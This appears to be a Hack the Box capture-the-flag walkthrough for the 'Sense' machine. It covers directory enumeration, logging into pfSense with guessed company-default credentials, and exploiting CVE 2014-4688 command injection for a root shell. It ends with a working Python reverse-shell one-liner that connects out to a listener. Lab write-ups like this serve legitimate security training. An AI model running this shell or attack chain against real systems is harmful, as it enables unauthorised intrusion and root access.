Writeup for Sense from Hack the Box

Service Enumeration -H -t all

There is a web service running on standard ports.

It turns out to be a pfSense login page.

The initial subdirectory enumeration did not yield anything interesting. If we look for .txt and .php files, however, we find some more interesting files.

gobuster dir -u -w /usr/share/dirb/wordlists/common.txt -x .txt,.php -k

The PHP pages will load the login page.

However, we find a changelog.txt:

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

Using a longer wordlist, /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt, we find another .txt file.

####Support ticket###

Please create the following user

username: Rohit
password: company defaults


The default credentials, admin:pfsense do not work. However, the system-users.txt file above indicated that a Rohit username exists, with a "company default" password.

Using the credentials rohit:pfsense, we successfully authenticate into the web application.

Here, we get more information on the system version.

This version is vulnerable to CVE 2014-4688, a command injection vulnerability.

Using code from, we can exploit the vulnerability.

Change the configuration to suit our needs:

username =         "rohit"
password =         "pfsense"
listener_ip =     ""
listener_port = "4444"
target_ip = ""

The service is running as root, so we get a root shell.

To upgrade to an interactive shell, we can catch the Python reverse shell on another terminal:

export RHOST="";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Last updated